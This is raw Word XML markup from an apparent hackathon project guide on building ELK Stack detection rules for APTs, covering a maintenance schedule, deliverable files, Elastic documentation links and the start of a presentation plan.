      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="210BA6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A1B20" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Weekly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41BF86BF" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Reindex new log formats</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BA12B6B" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Normalize new sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="1ABF20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F5570" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Monthly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C7D9AD5" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t xml:space="preserve">Update </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00463952">
              <w:t>GeoIP</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00463952">
              <w:t>/Threat intel feeds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19A99B7F" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Keep enrichment accurate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="5E4B00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B44C" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Monthly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C7DA4AB" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Validate model performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B2324E4" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Detect false positives</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="688642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DB390" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Quarterly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BBE8F73" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Clean old indices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08921D9A" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Free up disk space</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="3AC013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2A830" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Quarterly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23BAF95A" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Backup config &amp; snapshots</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56FCC936" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Disaster recovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75B72620" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="53CC1C42">
          <v:rect id="_x0000_i1124" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3E836D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📊</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 7.10 — Optional Enhancements (for bonus points)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F44B25C" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">Add a </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>web-based dashboard</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> outside Kibana (e.g., Flask/React) to display alerts in simpler UI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597B2B04" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Integrate Slack/Email notifications using Kibana alert actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652E301D" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Add a “threat summary report” PDF generator (use Kibana Reporting or Python).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F8A572" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="5864F534">
          <v:rect id="_x0000_i1125" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EFE93E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✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 7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3515"/>
      </w:tblGrid>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="6767FD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3DFC5" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00463952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093C3FCB" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00463952">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="40F3D1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97F0C" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>cron/retrain_model.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="393BA9F4" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Script for retraining on new data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="23F845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AB082" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00463952">
              <w:t>ilm-policy.json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25D0C" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Index Lifecycle Policy config</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="025836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DB13D" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>monitoring-dashboard.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04D534D3" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Screenshot of ELK Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="19AA9B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1003E" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>docs/system-maintenance.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11B2F696" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Maintenance schedule and commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="7957D4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2405" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>rules-sync.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4941B8B5" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Rule update automation script</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="39866097" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="341FB4F1">
          <v:rect id="_x0000_i1126" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73344ACF" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📘</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3826CBC1" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">ILM Policy Docs → </w:t>
      </w:r>
      <w:hyperlink r:id="rId66" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00463952">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/elasticsearch/reference/current/index-lifecycle-management.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="43637BF6" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">Machine Learning with Elastic → </w:t>
      </w:r>
      <w:hyperlink r:id="rId67" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00463952">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/machine-learning/current/ml-overview.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5A9765D5" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">Detection Rules Management API → </w:t>
      </w:r>
      <w:hyperlink r:id="rId68" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00463952">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/security/current/rules-api.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7D2A7192" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">ELK Snapshot/Restore → </w:t>
      </w:r>
      <w:hyperlink r:id="rId69" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00463952">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/elasticsearch/reference/current/snapshots.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6053DC08" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="3F6D4E5A">
          <v:rect id="_x0000_i1127" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2D11A0" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🎉</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>After Step 7</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t>, your project is now:</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> Fully functional</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> Continuously improving</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> Scalable &amp; demo-ready</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6C7BEB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🎤</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 8 — SIH Presentation &amp; Live Demo Plan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DABC8A" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Final Step — The “Showcase” Phase)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7FCFA1" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">This step helps you package your 7-step implementation into a </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>professional, competition-ready demonstration</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> with slides, screenshots, short video clips, and live actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644D10A1" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="3A02C15B">
          <v:rect id="_x0000_i1128" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B83D2B7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🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B37BBB5" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">To confidently </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>explain, demonstrate, and defend</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve"> your project in 5–7 minutes during Smart India Hackathon (SIH) judging, covering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7428C0BA" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>Problem → Solution → Implementation → Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A76A5B1" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:t>Live demo of detection pipeline in action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BF568A" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004536D2">
        <w:lastRenderedPageBreak/>
        <w:t>Innovation + Practical feasibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B679A71" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="16C08A9D">
          <v:rect id="_x0000_i1129" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="209C9E45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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 8.1 — Ideal Presentation Flow (6 slides total)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2909"/>
        <w:gridCol w:w="4158"/>
      </w:tblGrid>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="19F940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07FE7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Slide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DE79BA7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94B5499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Content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="763375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A5391" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1️</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>⃣</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Title &amp; Overview</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F04A14B" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Development of Threat Rules in ELK Stack for Detecting APTs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FAC75E3" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>- Team name, members, mentors</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:br/>
              <w:t>- Problem theme: Cybersecurity</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:br/>
              <w:t>- Organization: NTRO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="4D66B6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A5E36" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2️</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>⃣</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Problem &amp; Motivation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D3D0E76" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Why APT Detection Matters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A60C4B2" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>- Explain APTs: long-term, stealthy cyberattacks.</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:br/>
              <w:t>- Current issue: organizations fail to detect multi-stage attacks early.</w:t>
            </w:r>
            <w:r w:rsidRPr="004536D2">
              <w:br/>
              <w:t>- Example: Credential theft → lateral movement → data exfiltration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="412CDE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1404B" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
